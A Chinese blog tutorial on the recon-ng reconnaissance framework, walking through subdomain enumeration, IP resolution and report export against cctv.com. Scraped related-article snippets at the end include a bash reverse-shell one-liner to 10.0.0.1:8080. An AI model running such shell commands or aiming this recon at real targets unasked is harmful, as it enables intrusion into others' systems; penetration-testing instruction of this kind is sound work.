信息收集框架——recon-ng
背景:在渗透测试前期做攻击面发现(信息收集)时候往往需要用到很多工具,最后再将搜集到的信息汇总到一块。
现在有这样一个现成的框架,里面集成了许多信息收集模块、信息存储数据库、以及报告生成模块,为工程化信息收集提供了可能。
它就是recon-ng。recon-ng使用python编写,其使用方式和metasploit十分相似
使用方法介绍:
1、新建工作区(建议一个渗透目标一个工作区,这样能确保搜集到的信息都是针对一个目标的)
命令:Recon-ng -w 工作区名字
例:
recon-ng -w cctv
# 通过上面的命令创建‘cctv’工作区后可以通过如下命令查看工作区情况
[recon-ng][cctv] > show workspaces +------------+
| Workspaces |
+------------+
| cctv |
| default |
+------------+
2、设置搜索引擎api
Keys list ===>查看现有搜索引擎api
keys add shodan fdkasjkfljklasjkldffjalks ===>设置shodan搜索api
[recon-ng][cctv] > keys list +--------------------------+
| Name | Value |
+--------------------------+
| bing_api | |
| builtwith_api | |
| censysio_id | |
| censysio_secret | |
| flickr_api | |
| fullcontact_api | |
| github_api | |
| google_api | |
| hashes_api | |
| ipinfodb_api | |
| ipstack_api | |
| jigsaw_api | |
| jigsaw_password | |
| jigsaw_username | |
| pwnedlist_api | |
| pwnedlist_iv | |
| pwnedlist_secret | |
| shodan_api | |
| twitter_api | |
| twitter_secret | |
| virustotal_api | |
+--------------------------+ [recon-ng][cctv] > keys add shodan_api fdkasjkfljklasjkldffjalks
3、show options(查看全局设置)
[recon-ng][cctv] > show options Name Current Value Required Description
---------- ------------- -------- -----------
NAMESERVER 8.8.8.8 yes nameserver for DNS interrogation
PROXY no proxy server (address:port)
THREADS 10 yes number of threads (where applicable)
TIMEOUT 10 yes socket timeout (seconds)
USER-AGENT Recon-ng/v4 yes user-agent string
VERBOSITY 1 yes verbosity level (0 = minimal, 1 = verbose, 2 = debug)
建议设置代理,让可以访问google(不得不佩服google的搜索能力)
set PROXY 127.0.0.1:1087
4、查询包含哪些可用模块
通过use加tab键可以查看有哪些可用模块
[recon-ng][cctv] > use
discovery/info_disclosure/cache_snoop recon/domains-companies/pen recon/domains-hosts/threatcrowd recon/netblocks-hosts/shodan_net
discovery/info_disclosure/interesting_files recon/domains-contacts/metacrawler recon/domains-hosts/threatminer recon/netblocks-hosts/virustotal
exploitation/injection/command_injector recon/domains-contacts/pen recon/domains-vulnerabilities/ghdb recon/netblocks-ports/census_2012
exploitation/injection/xpath_bruter recon/domains-contacts/pgp_search recon/domains-vulnerabilities/punkspider recon/netblocks-ports/censysio
import/csv_file recon/domains-contacts/whois_pocs recon/domains-vulnerabilities/xssed recon/ports-hosts/migrate_ports
import/list recon/domains-credentials/pwnedlist/account_creds recon/domains-vulnerabilities/xssposed recon/profiles-contacts/dev_diver
recon/companies-contacts/bing_linkedin_cache recon/domains-credentials/pwnedlist/api_usage recon/hosts-domains/migrate_hosts recon/profiles-contacts/github_users
recon/companies-contacts/jigsaw/point_usage recon/domains-credentials/pwnedlist/domain_creds recon/hosts-hosts/bing_ip recon/profiles-profiles/namechk
recon/companies-contacts/jigsaw/purchase_contact recon/domains-credentials/pwnedlist/domain_ispwned recon/hosts-hosts/ipinfodb recon/profiles-profiles/profiler
recon/companies-contacts/jigsaw/search_contacts recon/domains-credentials/pwnedlist/leak_lookup recon/hosts-hosts/ipstack recon/profiles-profiles/twitter_mentioned
recon/companies-contacts/pen recon/domains-credentials/pwnedlist/leaks_dump recon/hosts-hosts/resolve recon/profiles-profiles/twitter_mentions
recon/companies-domains/pen recon/domains-domains/brute_suffix recon/hosts-hosts/reverse_resolve recon/profiles-repositories/github_repos
recon/companies-multi/github_miner recon/domains-hosts/bing_domain_api recon/hosts-hosts/ssltools recon/repositories-profiles/github_commits
recon/companies-multi/whois_miner recon/domains-hosts/bing_domain_web recon/hosts-hosts/virustotal recon/repositories-vulnerabilities/gists_search
recon/contacts-contacts/mailtester recon/domains-hosts/brute_hosts recon/hosts-locations/migrate_hosts recon/repositories-vulnerabilities/github_dorks
recon/contacts-contacts/mangle recon/domains-hosts/builtwith recon/hosts-ports/shodan_ip reporting/csv
recon/contacts-contacts/unmangle recon/domains-hosts/certificate_transparency recon/locations-locations/geocode reporting/html
recon/contacts-credentials/hibp_breach recon/domains-hosts/findsubdomains recon/locations-locations/reverse_geocode reporting/json
recon/contacts-credentials/hibp_paste recon/domains-hosts/google_site_web recon/locations-pushpins/flickr reporting/list
recon/contacts-domains/migrate_contacts recon/domains-hosts/hackertarget recon/locations-pushpins/shodan reporting/proxifier
recon/contacts-profiles/fullcontact recon/domains-hosts/mx_spf_ip recon/locations-pushpins/twitter reporting/pushpin
recon/credentials-credentials/adobe recon/domains-hosts/netcraft recon/locations-pushpins/youtube reporting/xlsx
recon/credentials-credentials/bozocrack recon/domains-hosts/shodan_hostname recon/netblocks-companies/whois_orgs reporting/xml
recon/credentials-credentials/hashes_org recon/domains-hosts/ssl_san recon/netblocks-hosts/reverse_resolve
也可以通过search命令来查找相关模块
[recon-ng][cctv] > search google
[*] Searching for 'google'... Recon
-----
recon/domains-hosts/google_site_web
此时大家可能会有疑问,这么多模块我怎么知道哪个模块是干什么使的呢? 这个时候我们可以use相应模块后用show info看到关于该模块的详细解释
[recon-ng][cctv] > use recon/domains-hosts/google_site_web
[recon-ng][cctv][google_site_web] > show info
Name: Google Hostname Enumerator
Path: modules/recon/domains-hosts/google_site_web.py
Author: Tim Tomes (@LaNMaSteR53)
Description:
Harvests hosts from Google.com by using the 'site' search operator. Updates the 'hosts' table with
the results.
Options:
Name Current Value Required Description
------ ------------- -------- -----------
SOURCE cctv.com yes source of input (see 'show info' for details)
Source Options:
default SELECT DISTINCT domain FROM domains WHERE domain IS NOT NULL
<string> string representing a single input
<path> path to a file containing a list of inputs
query <sql> database query returning one column of inputs
此外recon-ng会将收集到的信息自动存入数据库,后面咱们可以将这些数据掏出来进行二次查询。可以通过下面这个命令查看数据库有哪些表:
[recon-ng][cctv] > show schema +---------------+
| domains |
+---------------+
| domain | TEXT |
| module | TEXT |
+---------------+ +--------------------+
| companies |
+--------------------+
| company | TEXT |
| description | TEXT |
| module | TEXT |
+--------------------+ +-----------------+
| netblocks |
+-----------------+
| netblock | TEXT |
| module | TEXT |
+-----------------+ +-----------------------+
| locations |
+-----------------------+
| latitude | TEXT |
| longitude | TEXT |
| street_address | TEXT |
| module | TEXT |
+-----------------------+ +---------------------+
| vulnerabilities |
+---------------------+
| host | TEXT |
| reference | TEXT |
| example | TEXT |
| publish_date | TEXT |
| category | TEXT |
| status | TEXT |
| module | TEXT |
+---------------------+ +-------------------+
| ports |
+-------------------+
| ip_address | TEXT |
| host | TEXT |
| port | TEXT |
| protocol | TEXT |
| module | TEXT |
+-------------------+ +-------------------+
| hosts |
+-------------------+
| host | TEXT |
| ip_address | TEXT |
| region | TEXT |
| country | TEXT |
| latitude | TEXT |
| longitude | TEXT |
| module | TEXT |
+-------------------+ +--------------------+
| contacts |
+--------------------+
| first_name | TEXT |
| middle_name | TEXT |
| last_name | TEXT |
| email | TEXT |
| title | TEXT |
| region | TEXT |
| country | TEXT |
| module | TEXT |
+--------------------+ +-----------------+
| credentials |
+-----------------+
| username | TEXT |
| password | TEXT |
| hash | TEXT |
| type | TEXT |
| leak | TEXT |
| module | TEXT |
+-----------------+ +-----------------------------+
| leaks |
+-----------------------------+
| leak_id | TEXT |
| description | TEXT |
| source_refs | TEXT |
| leak_type | TEXT |
| title | TEXT |
| import_date | TEXT |
| leak_date | TEXT |
| attackers | TEXT |
| num_entries | TEXT |
| score | TEXT |
| num_domains_affected | TEXT |
| attack_method | TEXT |
| target_industries | TEXT |
| password_hash | TEXT |
| password_type | TEXT |
| targets | TEXT |
| media_refs | TEXT |
| module | TEXT |
+-----------------------------+ +---------------------+
| pushpins |
+---------------------+
| source | TEXT |
| screen_name | TEXT |
| profile_name | TEXT |
| profile_url | TEXT |
| media_url | TEXT |
| thumb_url | TEXT |
| message | TEXT |
| latitude | TEXT |
| longitude | TEXT |
| time | TEXT |
| module | TEXT |
+---------------------+ +-----------------+
| profiles |
+-----------------+
| username | TEXT |
| resource | TEXT |
| url | TEXT |
| category | TEXT |
| notes | TEXT |
| module | TEXT |
+-----------------+ +--------------------+
| repositories |
+--------------------+
| name | TEXT |
| owner | TEXT |
| description | TEXT |
| resource | TEXT |
| category | TEXT |
| url | TEXT |
| module | TEXT |
+--------------------+
5、使用方法举例(拿搜索子域名与对应ip的场景来举例)
使用google搜索来查询目标有哪些子域名
[recon-ng][cctv] > use recon/domains-hosts/google_site_web
[recon-ng][cctv][google_site_web] > show options # 查看需要填哪些数据 Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details) [recon-ng][cctv][google_site_web] > set SOURCE cctv.com # 设置目标域名
SOURCE => cctv.com
[recon-ng][cctv][google_site_web] > run #开始运行
也可以使用暴力猜解的方式来获取目标子域名:
[recon-ng][cctv] > use recon/domains-hosts/brute_hosts
[recon-ng][cctv][brute_hosts] > show options Name Current Value Required Description
-------- ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details)
WORDLIST /usr/local/Cellar/recon-ng/4.9.6/libexec/data/hostnames.txt yes path to hostname wordlist # 字典路径 [recon-ng][cctv][brute_hosts] > set SOURCE cctv.com # 设置目标域名
SOURCE => cctv.com
[recon-ng][cctv][brute_hosts] > run #开始运行
运行完毕后查询到的数据将自动存入数据库,我们可以通过'show hosts'或'query+sql语句'的方式来查询,例:
[recon-ng][cctv] > show hosts +-----------------------------------------------------------------------------------------------------------+
| rowid | host | ip_address | region | country | latitude | longitude | module |
+-----------------------------------------------------------------------------------------------------------+
| 1 | tv.cctv.com | | | | | | google_site_web |
| 2 | www.cctv.com | | | | | | google_site_web |
| 3 | news.cctv.com | | | | | | google_site_web |
+-----------------------------------------------------------------------------------------------------------+
[recon-ng][cctv] >query select * from hosts;
+-----------------------------------------------------------------------------------------------------------+
| rowid | host | ip_address | region | country | latitude | longitude | module |
+-----------------------------------------------------------------------------------------------------------+
| 1 | tv.cctv.com | | | | | | google_site_web |
| 2 | www.cctv.com | | | | | | google_site_web |
| 3 | news.cctv.com | | | | | | google_site_web |
+-----------------------------------------------------------------------------------------------------------+
# 为了保证隐私删掉了大部分数据,只给3个做为举例
数据库里已经有目标的子域名信息,现在想基于数据库里信息做进一步查询可以吗? 当然可以,我们以查询域名对应的ip为例:
[recon-ng][cctv] > use recon/hosts-hosts/resolve
[recon-ng][cctv][resolve] > show options Name Current Value Required Description
------ ------------- -------- -----------
SOURCE default yes source of input (see 'show info' for details) # 正常来说SOURCE后应该是跟一个域名信息,比如'www.cctv.com' [recon-ng][cctv][resolve] > set SOURCE query select host from hosts # 这里厉害了哦!我们要查的是一个表的内容,如果一个域名设置一次那还不累死了? recon-ng竟然支持将值设为一个sql语句! 这样就可以批量查询表内的数据了!
SOURCE => query select host from hosts
[recon-ng][cctv][resolve] > run
执行完成后我们可以看下现在数据库里的内容有什么变化:
[recon-ng][cctv][resolve] > show hosts
+----------------------------------------------------------------------------------------------------------------+
| rowid | host | ip_address | region | country | latitude | longitude | module |
+----------------------------------------------------------------------------------------------------------------+
| 1 | tv.cctv.com | 123.125.195.125 | | | | | google_site_web |
| 2 | www.cctv.com | 114.112.172.231 | | | | | google_site_web |
| 3 | news.cctv.com | 111.206.186.245 | | | | | google_site_web |
| 4 | tv.cctv.com | 123.125.195.125 | | | | | resolve |
| 5 | www.cctv.com | 114.112.172.231 | | | | | resolve |
| 6 | news.cctv.com | 111.206.186.245 | | | | | resolve |
+----------------------------------------------------------------------------------------------------------------+
# 可以看到已经把查询到的ip地址填入表内了
就拿我们现在查询到的数据来举例说明一下该怎么导出报表
[recon-ng][cctv] > search report # 查下看有哪些报表相关模块
[*] Searching for 'report'... Reporting
---------
reporting/csv
reporting/html
reporting/json
reporting/list
reporting/proxifier
reporting/pushpin
reporting/xlsx
reporting/xml [recon-ng][cctv] > use reporting/html # 导出成html文件
[recon-ng][cctv][html] > show options Name Current Value Required Description
-------- ------------- -------- -----------
CREATOR yes creator name for the report footer
CUSTOMER yes customer name for the report header
FILENAME /Users/liwei/.recon-ng/workspaces/cctv/results.html yes path and filename for report output # 报表导出路径
SANITIZE True yes mask sensitive data in the report [recon-ng][cctv][html] > set CREATOR liwei # 填写报告作者
CREATOR => liwei
[recon-ng][cctv][html] > set CUSTOMER cctv # 填写用户单位名称
CUSTOMER => cctv
[recon-ng][cctv][html] > run
[*] Report generated at '/Users/liwei/.recon-ng/workspaces/cctv/results.html'. # 导出成功
[recon-ng][cctv][html] >
最终报表长这样:
注:以下是引自网友对各个模块的简要说明:
cache_snoop – DNS缓存录制 interesting_files – 敏感文件探测 command_injector – 远程命令注入shell接口 xpath_bruter – Xpath注入爆破 csv_file – 高级csv文件导入 list – List文件导入 point_usage – Jigsaw – 统计信息提取用法 purchase_contact – Jigsaw – 简单的联系查询 search_contacts – Jigsaw联系枚举 jigsaw_auth – Jigsaw认证联系枚举 linkedin_auth – LinkedIn认证联系枚举 github_miner – Github资源挖掘 whois_miner – Whois数据挖掘 bing_linkedin – Bing Linkedin信息采集 email_validator – SalesMaple邮箱验证 mailtester – MailTester邮箱验证 mangle – 联系分离 unmangle –联系反分离 hibp_breach –Breach搜索 hibp_paste – Paste搜索 pwnedlist – PwnedList验证 migrate_contacts – 域名数据迁移联系 facebook_directory – Facebook目录爬行 fullcontact – FullContact联系枚举 adobe – Adobe Hash破解 bozocrack – PyBozoCrack Hash 查询 hashes_org – Hashes.org Hash查询 leakdb – leakdb Hash查询 metacrawler – 元数据提取 pgp_search – PGP Key Owner查询 salesmaple – SalesMaple联系获取 whois_pocs – Whois POC获取 account_creds – PwnedList – 账户认证信息获取 api_usage – PwnedList – API使用信息 domain_creds – PwnedList – Pwned域名认证获取 domain_ispwned – PwnedList – Pwned域名统计获取 leak_lookup – PwnedList – 泄露信息查询 leaks_dump – PwnedList –泄露信息获取 brute_suffix – DNS公共后缀爆破 baidu_site – Baidu主机名枚举 bing_domain_api – Bing API主机名枚举 bing_domain_web – Bing主机名枚举 brute_hosts – DNS主机名爆破 builtwith – BuiltWith枚举 google_site_api – Google CSE主机名枚举 google_site_web – Google主机名枚举 netcraft – Netcraft主机名枚举 shodan_hostname – Shodan主机名枚举 ssl_san – SSL SAN查询 vpnhunter – VPNHunter查询 yahoo_domain – Yahoo主机名枚举 zone_transfer – DNS域文件收集 ghdb – Google Hacking数据库 punkspider – PunkSPIDER漏洞探测 xssed – XSSed域名查询 xssposed – XSSposed域名查询 migrate_hosts – 域名数据迁移host bing_ip – Bing API旁站查询 freegeoip –FreeGeoIP ip定位查询 ip_neighbor – My-IP-Neighbors.com查询 ipinfodb – IPInfoDB GeoIP查询 resolve – 主机名解析器 reverse_resolve – 反解析 ssltools – SSLTools.com主机名查询 geocode – 地理位置编码 reverse_geocode – 反地理位置编码 flickr – Flickr地理位置查询 instagram – Instagram地理位置查询 picasa – Picasa地理位置查询 shodan – Shodan地理位置查询 twitter – Twitter地理位置查询 whois_orgs – Whois公司信息收集 reverse_resolve – 反解析 shodan_net – Shodan网络枚举 census_2012 – Internet Census 2012 查询 sonar_cio – Project Sonar查询 migrate_ports – 主机端口数据迁移 dev_diver – Dev Diver Repository检查 linkedin – Linkedin联系获取 linkedin_crawl – Linkedin信息抓取 namechk – NameChk.com用户名验证 profiler – OSINT HUMINT信息收集 twitter – Twitter操作 github_repos – Github代码枚举 gists_search – Github Gist搜索 github_dorks – Github Dork分析 csv – CSV文件生成 html – HTML报告生成 json – JSON报告生成 list – List生成 pushpin – PushPin报告生成 xlsx – XLSX文件创建 xml – XML报告生成
信息收集框架——recon-ng的更多相关文章
- Kali Linux信息收集工具
http://www.freebuf.com/column/150118.html 可能大部分渗透测试者都想成为网络空间的007,而我个人的目标却是成为Q先生! 看过007系列电影的朋友,应该都还记得 ...
- Kali Linux信息收集工具全集
001:0trace.tcptraceroute.traceroute 描述:进行路径枚举时,传统基于ICMP协议的探测工具经常会受到屏蔽,造成探测结果不够全面的问题.与此相对基于TCP协议的探测,则 ...
- Kali Linux信息收集工具全
可能大部分渗透测试者都想成为网络空间的007,而我个人的目标却是成为Q先生! 看过007系列电影的朋友,应该都还记得那个戏份不多但一直都在的Q先生(由于年级太长目前已经退休).他为007发明了众多神奇 ...
- OSNIT信息收集分析框架OSRFramework
OSNIT信息收集分析框架OSRFramework OSNIT是一种从公开的信息资源搜集信息的有效方式.Kali Linux集成了一款专用分析工具集OSRFramework.该工具集包含多个常用工具 ...
- 小白日记6:kali渗透测试之被动信息收集(五)-Recon-ng
Recon-ng Recon-NG是由python编写的一个开源的Web侦查(信息收集)框架.Recon-ng框架是一个全特性的工具,使用它可以自动的收集信息和网络侦查.其命令格式与Metasploi ...
- 被动信息收集-其他收集目标信息的途径:cupp、 recon-ng
除了google等搜索收集,还有其他途径进行信息收集,其中就包括用命令行或集成的软件.框架进行搜集信息. 1.先举例几个简单的命令: 其实也会是调用搜索引擎,如谷歌必应等,需要翻墙,可以用proxyc ...
- 『.NET Core CLI工具文档』(二).NET Core 工具遥测(应用信息收集)
说明:本文是个人翻译文章,由于个人水平有限,有不对的地方请大家帮忙更正. 原文:.NET Core Tools Telemetry 翻译:.NET Core 工具遥测(应用信息收集) .NET Cor ...
- ExceptionLess异常日志收集框架-1
哈哈,中秋和代码更配哦,不知不觉一年过半了,祝园友们中秋快乐 前一阵子在博客园看到了一篇博文 http://www.cnblogs.com/savorboard/p/exceptionless.htm ...
- 漫谈iOS Crash收集框架
漫谈iOS Crash收集框架 Crash日志收集 为了能够第一时间发现程序问题,应用程序需要实现自己的崩溃日志收集服务,成熟的开源项目很多,如 KSCrash,plcrashreporter,C ...
随机推荐
- GIT \ SVN 版本管理 git + gitHub
场景1 想删除一个段落,又怕将来想恢复找不回来怎么办?有办法,先把当前文件"另存为--"一个新的Word文件,再接着改,改到一定程度,再"另存为--"一个新 ...
- Dijkstra算法与堆(C++)
Dijkstra算法用于解决单源最短路径问题,通过逐个收录顶点来确保得到以收录顶点的路径长度为最短. 图片来自陈越姥姥的数据结构课程:https://mooc.study.163.com/l ...
- Innovus教程 - Flow系列 - MMMC分析环境的配置概述(理论+实践+命令)
本文转自:自己的微信公众号<集成电路设计及EDA教程> <Innovus教程 - Flow系列 - MMMC分析环境的配置概述(理论+实践+命令)> 轻轻走过,悄悄看过,无 ...
- 微服务SpringCloud之熔断器
学习SpringCloud微服务是参考纯洁的微笑博客,看到他提到股市的熔断我也忍不住吐槽一下,记得当时实施熔断第一天就熔断了,现在想想也还是搞笑,从之前的全民炒股到现在的全民炒房,都是一个炒字,问题是 ...
- 剑指offer第二版-总结:二叉树的遍历
思想:前序(根左右),中序(左根右),后序(左右根) 前序非递归遍历: 首先判断根是否为空,将根节点入栈 1.若栈为空,则退出循环 2.将栈顶元素弹出,访问弹出的节点 3.若弹出的节点的右孩子不为空则 ...
- web安全测试必须注意的五个方面
随着互联网的飞速发展,web应用在软件开发中所扮演的角色变得越来越重要,同时,web应用遭受着格外多的安全攻击,其原因在于,现在的网站以及在网站上运行的应用在某种意义上来说,它是所有公司或者组织的虚拟 ...
- Learning the Depths of Moving People by Watching Frozen
基于双目的传统算法 对静止的物体, 在不同的 viewpoints 同一时刻进行拍摄, 根据拍摄到的结果, 使用三角测量算法计算出平面 2D 图像在 3D 图像中的坐标 单目 Ground Truth ...
- python函数知识四 迭代器、生成器
15.迭代器:工具 1.可迭代对象: 官方声明,只要具有__iter__方法的就是可迭代对象 list,dict,str,set,tuple -- 可迭代对象,使用灵活 #方法一: list.__ ...
- CVE-2018-4407 漏洞复现POC
pip install scapy import scapy from scapy.all import * send(IP(dst="192.168.1.132",options ...
- linux几种方式来弹哥shell
渗透测试linux主机的时候,能够去 弹个shell进行交互是非常重要的 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i :打 ...